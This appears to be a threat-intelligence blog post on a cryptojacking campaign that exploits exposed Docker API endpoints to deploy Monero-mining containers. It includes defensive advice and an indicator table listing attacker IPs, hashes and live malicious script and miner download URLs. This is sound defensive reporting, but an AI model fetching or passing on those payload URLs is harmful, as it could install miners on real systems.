Feb 05, 2025
Cryptojacking Campaign Targets Docker and Kubernetes: Surge in Container-Based Attacks
A recent surge in cryptojacking campaigns has targeted unsecured Docker and Kubernetes environments, exploiting misconfigurations to gain unauthorized access. These attacks leverage open API endpoints in Docker hosts, allowing threat actors to deploy malicious containers designed for cryptocurrency mining, specifically Monero. The campaign primarily targets high-performance cloud infrastructures, draining system resources and leading to significant operational slowdowns for affected organizations.
AI illustration of the cyberjacking campaign
The attacks underscore the growing trend of resource hijacking in cloud environments, where attackers exploit common deployment misconfigurations. As the campaign evolved, the malware demonstrated advanced lateral movement capabilities, enabling it to infect multiple containers across networks, prolonging the attack and maximizing cryptocurrency mining gains before detection.
Key Attack Techniques
The campaign capitalized on exposed Docker API endpoints lacking proper authentication, allowing attackers to remotely execute commands and deploy cryptocurrency-mining containers. Once inside, the attackers utilized sophisticated lateral movement techniques to infect other containers within the same environment, maximizing their control and mining capabilities.
Organizations in sectors such as finance, healthcare, and technology, which rely on container-based cloud infrastructures, are at significant risk. These cryptojacking operations can severely impact service performance, drive up costs, and cause major business disruptions.
Defensive Strategies
To mitigate the risk of cryptojacking, organizations should:
- Secure Docker and Kubernetes APIs: Implement proper authentication measures and ensure endpoints are not publicly exposed.
- Monitor Container Activity: Set up robust monitoring mechanisms to detect unusual container activities that might signal a cryptojacking operation.
- Limit Resource Usage: Apply resource constraints to containers, minimizing the potential damage from any unauthorized activity.
- Patch Management: Regularly update container environments to avoid known vulnerabilities.
Indicators of Compromise (IOC) and Techniques (TTP)
| Category | Details |
| IP Addresses | 45.9.148.35, 164.68.106.96, 192.155.94.199, 147.75.47.199 |
| Hashes | 82874f856a71a751f0bdb1ce7a3b7bb6, e10e3934d7659e00cc7f47b569af9ff5, 505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a |
| URLs | http://45.9.148.35/aws, http://solscan.live/sh/init.sh, https://solscan.live/bin/xmrig |
| TTP (MITRE ATT&CK) | T1222.002: Linux and Mac File and Directory Permissions Modification, T1053.003: Cron, T1021.004: SSH |
| Killchain Stage | Initial Exploitation, Privilege Escalation, Execution, Lateral Movement |
| Malicious Scripts | Example: http://solscan.live/sh/xmr.sh.sh, http://solscan.live/sh/setup_xmr.sh, http://solscan.live/incoming/docker.php?dockerT= |
This cryptojacking campaign continues to evolve, highlighting the vulnerabilities inherent in container environments. Organizations should prioritize securing cloud-based systems and monitoring for signs of resource hijacking.
In conclusion, this surge in cryptojacking attacks targeting Docker and Kubernetes environments highlights the urgent need for robust cloud security measures. To stay informed about evolving cyber threats, including campaigns similar to this cryptojacking incident, explore other active threats listed on the SOCRadar Campaigns page. Here, you’ll find detailed insights into current cyber campaigns, helping you safeguard your organization against emerging threats.
Related Articles
Subscribe to our newsletter and stay updated on the latest insights!
